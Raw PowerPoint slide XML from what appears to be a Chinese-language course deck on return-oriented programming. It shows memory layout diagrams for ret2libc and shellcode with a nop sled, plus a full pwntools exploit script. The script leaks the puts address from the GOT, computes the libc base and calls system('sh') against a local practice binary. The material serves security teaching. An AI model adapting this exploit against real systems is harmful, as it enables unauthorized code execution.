            <a:ext cx="59352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err="1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plt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表中没有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system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，需要借助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puts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函数和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system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函数在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc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库中的相对便宜地址和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puts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函数的实际地址</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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puts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函数的实际地址通过与程序互动得到</a:t>
            </a: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8027A9E2-02B7-1D9E-A386-4CB2C182EB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2478" y="1201740"/>
            <a:ext cx="4573460" cy="4505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68413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6F542C06-4F84-45F8-A155-C9C1CA996953}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6850225" y="589958"/>
            <a:ext cx="3883027" cy="6061957"/>
            <a:chOff x="4584869" y="992499"/>
            <a:chExt cx="5738979" cy="5436216"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="4" name="Shape 624">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A8DC2CD-6D8B-473D-BD39-E56AFEDCFDC5}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4584869" y="992499"/>
              <a:ext cx="5738977" cy="5436216"/>
              <a:chOff x="4897548" y="888136"/>
              <a:chExt cx="1363202" cy="3513619"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="6" name="Shape 625">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{529DE509-C2E4-44BB-8BE6-C481AF3FA52E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="888136"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>For Kernel</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="7" name="Shape 626">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7F13D3A9-59E1-48B7-B88F-AFA6E52583E9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897548" y="1162600"/>
                <a:ext cx="1363200" cy="532702"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 627">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9D023FC-2D0D-4160-AE9D-3A16DB1F7623}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="1695037"/>
                <a:ext cx="1363200" cy="345399"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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" name="Shape 628">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2EC5BF3E-1C26-460D-BF4F-9870124E7288}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2040436"/>
                <a:ext cx="1363200" cy="442800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" name="Shape 629">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F78A3CD3-E481-4F8E-BA23-04776A31C3E4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2483236"/>
                <a:ext cx="1363200" cy="410861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFFFFF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Shape 630">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3C36562-15E1-44F3-A275-54744B61749F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="2894098"/>
                <a:ext cx="1363200" cy="274195"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="D9EAD3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dirty="0"/>
                  <a:t>Heap</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Shape 631">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6286BDDF-878B-4830-8C97-41E0EAD0356C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="3331789"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="F4CCCC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dirty="0"/>
                  <a:t>Data</a:t>
                </a:r>
                <a:endParaRPr dirty="0"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Shape 632">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F9282ED0-348A-430C-9614-46B78381CB83}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897550" y="3607695"/>
                <a:ext cx="1363200" cy="519861"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFF2CC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" name="Shape 633">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D40C47C8-3847-4696-ACE1-0EAF89E09DA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="4897549" y="4127555"/>
                <a:ext cx="1363200" cy="274200"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="666666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rgbClr val="FFFFFF"/>
                    </a:solidFill>
                  </a:rPr>
                  <a:t>Unused</a:t>
                </a:r>
                <a:endParaRPr>
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="15" name="Shape 634">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FDAEC4A-0225-4A8A-BE4B-B55D902BD42D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="8" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="5579150" y="1695037"/>
                <a:ext cx="0" cy="109299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16" name="Shape 635">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B83DCF5A-918C-4F83-A5BF-9C91701057AB}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="11" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="5579150" y="2559899"/>
                <a:ext cx="4460" cy="334199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</p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="Shape 631">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E991AC80-276A-4219-AB15-7858AE929F7C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4584879" y="1844876"/>
              <a:ext cx="5738969" cy="251142"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="E4808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zh-CN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ret_addr</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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= </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN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gadget_addr</a:t>
              </a:r>
              <a:endParaRPr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17" name="文本框 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{687AF02C-0789-432C-A9DB-7FED09A1EB89}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10891289" y="1208198"/>
            <a:ext cx="858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Stack</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="19" name="连接符: 肘形 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E0522E-454E-4538-B2E5-F09C06D10F87}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="5" idx="1"/>
            <a:endCxn id="28" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000" flipV="1">
            <a:off x="6850228" y="1680473"/>
            <a:ext cx="5" cy="4317113"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 4572100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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hape 628">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{402A0AF2-2DF5-4833-A710-9AE68DA39E2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850231" y="4525879"/>
            <a:ext cx="3883021" cy="28005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Bss</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B214794-FBBA-4945-A292-0508CF388B3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850228" y="2870890"/>
            <a:ext cx="3883021" cy="280050"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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system()</a:t>
            </a:r>
            <a:endParaRPr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6" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205AB67C-501F-40F0-8689-F6517E7BED78}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850227" y="5424639"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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7" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA5398DD-AE7B-423E-8E84-8F2A8BAB8D0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850226" y="5687810"/>
            <a:ext cx="3883021" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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8" name="Shape 631">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88E1BCE5-B970-4E1D-82FF-E1B7AD45DB53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6850227" y="5929372"/>
            <a:ext cx="3883020" cy="136429"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E4808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gadget</a:t>
            </a:r>
            <a:endParaRPr sz="105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30" name="连接符: 肘形 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2972708F-45F0-4F8E-98E0-FC2D921E34A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="28" idx="3"/>
            <a:endCxn id="26" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="10733247" y="5492854"/>
            <a:ext cx="1" cy="504733"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 22860100000"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln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连接符 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{96EAFB68-708F-4923-88DD-5E3D4754A336}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="26" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6375621" y="5492854"/>
            <a:ext cx="474606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>
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A878DC5F-61BF-447E-907F-4E64EBF7FBB1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6375612" y="5492854"/>
            <a:ext cx="9" cy="262161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箭头连接符 67">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5CE1A2E0-2A79-4732-A1CE-20006EBE7728}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6375612" y="5755015"/>
            <a:ext cx="474614" cy="1010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连接符 72">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0CF40EE0-451A-4D1B-8223-CF358B34CEF6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="27" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10733247" y="5756025"/>
            <a:ext cx="474606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连接符 73">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77ED6BB8-F57E-4314-B3FF-D518A5ABE6DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11207839" y="3010915"/>
            <a:ext cx="0" cy="2744427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箭头连接符 74">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{17FFE878-B274-44B8-B580-E714AD5E7C63}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:endCxn id="21" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="10733249" y="3010915"/>
            <a:ext cx="474578" cy="0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文本框 84">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{53875BE4-F753-48AB-B2FB-D393F8BBEE01}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11320706" y="2784110"/>
            <a:ext cx="858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Libc</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="86" name="文本框 85">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8C9A344-EC85-4111-8599-9A72C59B0E4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11321050" y="5545729"/>
            <a:ext cx="858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Text</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0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D1FFE461-B8E4-4C17-A1A3-67FF7C4A0306}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="280052" y="589958"/>
            <a:ext cx="6332870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from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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pwn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import *</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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io = process("./ret2libc3")</a:t>
            </a:r>
          </a:p>
          <a:p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elf = ELF("./ret2libc3")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc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= ELF("./libc-2.31.so")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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# Give me an address (in dec) :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendlineafter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(b" :", str(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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elf.got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["puts"]))</a:t>
            </a:r>
          </a:p>
          <a:p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# The content of the address : %p\n</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.recvuntil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(b" : ")</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libcBase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= int(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.recvuntil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(b"\n", drop=True), 16) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc.symbols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["puts"]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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success("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libcBase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=&gt; {:#x}".format(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libcBase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))</a:t>
            </a:r>
          </a:p>
          <a:p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payload = flat(cyclic(60), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libcBase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+ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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libc.symbols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["system"], 0xdeadbeef, next(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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elf.search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(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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b"sh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\x00")))</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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# Leave some message for me :</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1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io.sendlineafter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(b" :", payload)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN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en-US" altLang="zh-CN" dirty="0" err="1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io.interactive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()</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US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48E567E0-7103-4116-BA78-1A8F51CB386D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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返回导向编程 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ret2libc3</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="22561147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6" name="Shape 1416"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="2200200"/>
            <a:ext cx="2095200" cy="4096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char **argv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417" name="Shape 1417"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="2609800"/>
            <a:ext cx="2095200" cy="4096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int argc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418" name="Shape 1418"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3019400"/>
            <a:ext cx="2095200" cy="4096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shellcode addr</a:t>
            </a:r>
            <a:endParaRPr sz="1867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419" name="Shape 1419"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3429000"/>
            <a:ext cx="2095200" cy="4096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shellcode</a:t>
            </a:r>
            <a:endParaRPr sz="1867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420" name="Shape 1420"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2189494" y="3838600"/>
            <a:ext cx="2095200" cy="16268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nop sled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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="1421" name="Shape 1421"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="1418" idx="3"/>
            <a:endCxn id="1420" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4284694" y="3224200"/>
            <a:ext cx="800" cy="1428000"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 39687500"/>
            </a:avLst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22" name="Shape 1422"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="1814194" y="3065133"/>
            <a:ext cx="0" cy="23972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23" name="Shape 1423"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1078060" y="3823700"/>
            <a:ext cx="9938400" cy="304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1424" name="Shape 1424"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="479060" y="3321366"/>
            <a:ext cx="1183600" cy="4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Overflow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425" name="Shape 1425"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="2206000"/>
            <a:ext cx="2095200" cy="4096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"/bin/sh"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426" name="Shape 1426"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="2615600"/>
            <a:ext cx="2095200" cy="4096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exit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427" name="Shape 1427"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="3025200"/>
            <a:ext cx="2095200" cy="4096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system</a:t>
            </a:r>
            <a:endParaRPr sz="1867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428" name="Shape 1428"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7046627" y="3434800"/>
            <a:ext cx="2095200" cy="4096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padding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429" name="Shape 1429"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
